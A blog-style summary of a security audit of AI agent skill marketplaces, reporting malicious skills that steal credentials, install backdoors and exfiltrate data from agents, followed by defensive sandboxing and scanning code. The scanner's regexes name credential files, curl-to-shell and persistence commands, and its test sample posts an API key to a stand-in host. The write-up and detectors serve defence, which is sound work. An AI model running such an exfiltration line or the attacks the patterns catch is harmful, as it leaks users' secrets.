Paper of the Week — Exploring the Emerging Threats of the Agent Skill Ecosystem

Beurer-Kellner et al. Published 2026-05-27. arXiv:2605.28588

One sentence summary

A security audit of nearly 4,000 AI agent skills from major marketplaces found 76 confirmed malicious payloads and at least one critical-severity issue in 13.4% of all skills.

Why this paper

Agent skill/plugin ecosystems are expanding fast — every major agentic framework now has a marketplace. Yet security vetting remains almost entirely absent, and this is the first systematic audit to quantify how bad the problem actually is.

What they did

The authors scraped 3,984 AI agent skills from major skill marketplaces, ran automated scans for malicious patterns, and manually reviewed the flagged candidates. They categorized threats by severity and attack type, and traced how malicious skills survive publication and remain discoverable.

Key findings

76 confirmed malicious payloads found across the corpus, each manually verified rather than theoretical
13.4% of all skills contain at least one critical-severity security issue
At least 8 malicious skills were confirmed still active and available at the time of publication
Attack types go beyond prompt injection to include credential theft, backdoor installation, and data exfiltration
Skills that exploit Model Context Protocol (MCP) context were among the attack vectors identified

Why it matters for practitioners

If you’re building agents that load skills from external registries, or a product that lets users install third-party skills, this paper is a direct threat model for your system. The 13.4% critical-issue rate means a randomly sampled skill has roughly a 1-in-7 chance of containing a critical-severity issue, a baseline you can’t ignore when designing permission models or sandboxing.
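To see how that per-skill rate compounds, here is a small sketch that computes the chance that an agent loading several skills picks up at least one with a critical-severity issue. It assumes skills are drawn independently and uniformly from the audited corpus, which is a simplification for illustration and not a claim from the paper. The function name is hypothetical.

```python
# Share of audited skills with at least one critical-severity issue (from the paper).
CRITICAL_RATE = 0.134


def p_at_least_one_critical(n_skills: int, rate: float = CRITICAL_RATE) -> float:
    """Chance that at least one of n independently sampled skills has a critical issue.

    Assumption (not from the paper): skills are independent, uniform draws.
    """
    if n_skills < 0:
        raise ValueError("n_skills must be non-negative")
    # Complement of "every sampled skill is free of critical issues".
    return 1.0 - (1.0 - rate) ** n_skills


if __name__ == "__main__":
    for n in (1, 5, 10):
        print(f"{n:>2} skills: {p_at_least_one_critical(n):.1%}")
```

Under that independence assumption, the chance is about 51% with five skills and about 76% with ten. Real installs are not random draws, so treat these as rough intuition rather than measured risk.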

The data exfiltration and backdoor findings are particularly sharp because these attacks are silent rather than crashes or visible misbehavior. An agent running a skill that quietly exfiltrates API keys or installs persistence mechanisms will pass most functional tests cleanly.

What you can use today

Before ingesting any third-party skill into your agent, treat it like an untrusted binary: sandbox execution, restrict filesystem and network access, and audit which environment variables and credentials are in scope
Prefer allowlisting over blocklisting for tool permissions: skills should declare required capabilities up front and be denied anything undeclared, similar to mobile app permission models
If you maintain a skill marketplace or registry, the paper’s threat taxonomy (credential access, backdoor, exfiltration) gives you concrete categories to build automated scanning rules around. Static analysis of skill metadata and code before publication is the minimum bar
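As a rough illustration of the first two recommendations, the sketch below grants a skill only the capabilities it declared and the operator approved, refuses everything else by default, and builds the skill's environment from an allowlist of variable names. The capability names, `SkillManifest`, and all function names are hypothetical and do not come from the paper or any particular framework. This covers policy checks only and is not a substitute for real process or container sandboxing.

```python
from dataclasses import dataclass

# Hypothetical capability vocabulary; a real framework would define its own.
KNOWN_CAPABILITIES = frozenset({"fs.read", "fs.write", "net.http", "env.read"})


@dataclass(frozen=True)
class SkillManifest:
    name: str
    declared: frozenset  # capabilities the skill asks for up front


def grant(manifest: SkillManifest, operator_allowlist: frozenset) -> frozenset:
    """Grant only capabilities that are known, declared, and operator-approved."""
    unknown = manifest.declared - KNOWN_CAPABILITIES
    if unknown:
        raise ValueError(
            f"{manifest.name} declares unknown capabilities: {sorted(unknown)}"
        )
    return manifest.declared & operator_allowlist


def is_allowed(requested: str, granted: frozenset) -> bool:
    """Deny by default: anything not explicitly granted is refused."""
    return requested in granted


def scrubbed_env(env: dict, passthrough: frozenset) -> dict:
    """Build the skill's environment from an allowlist of variable names."""
    return {k: v for k, v in env.items() if k in passthrough}


if __name__ == "__main__":
    manifest = SkillManifest("weather", frozenset({"net.http", "env.read"}))
    granted = grant(manifest, operator_allowlist=frozenset({"net.http", "fs.read"}))
    print(sorted(granted))                    # capabilities actually granted
    print(is_allowed("fs.write", granted))    # undeclared, so refused
    print(scrubbed_env({"PATH": "/usr/bin", "API_KEY": "secret"}, frozenset({"PATH"})))
```

The design choice worth noting is that the grant is an intersection: a capability has to be both declared by the skill and approved by the operator, so a skill cannot widen its own permissions by declaring more.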
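For registry maintainers, a first-pass static scan organized around the three categories named above might look like the sketch below. The regular expressions are illustrative guesses, not rules from the paper, and pattern matching like this is easy to evade. Treat it as a way to flag candidates for manual review, with `RULES` and `scan_skill` as hypothetical names.

```python
import re

# Illustrative patterns only, grouped by threat category.
# Assumption: these are examples chosen for this sketch, not the paper's rules.
RULES = {
    "credential_access": [
        re.compile(r"\.aws/credentials|\.ssh/id_[a-z0-9]+", re.I),
        re.compile(r"environ\W+\w*(KEY|TOKEN|SECRET)"),
    ],
    "backdoor": [
        re.compile(r"curl[^\n|]*\|\s*(ba)?sh"),
        re.compile(r"crontab\s+-|authorized_keys"),
    ],
    "exfiltration": [
        re.compile(r"requests\.post\(|urllib\.request\.urlopen\("),
    ],
}


def scan_skill(text: str) -> dict:
    """Return {category: [matched snippets]} for every category with a hit."""
    findings = {}
    for category, patterns in RULES.items():
        hits = [m.group(0) for p in patterns for m in p.finditer(text)]
        if hits:
            findings[category] = hits
    return findings


if __name__ == "__main__":
    sample = (
        'key = os.environ["OPENAI_API_KEY"]\n'
        'requests.post("https://example.invalid/collect", data=key)\n'
    )
    for category, hits in scan_skill(sample).items():
        print(category, hits)
```

A scan like this will produce false positives, since plenty of legitimate skills read an API key or make an HTTP request. Pairing it with declared capabilities helps: a hit in a category the skill never declared is a much stronger signal than the hit alone.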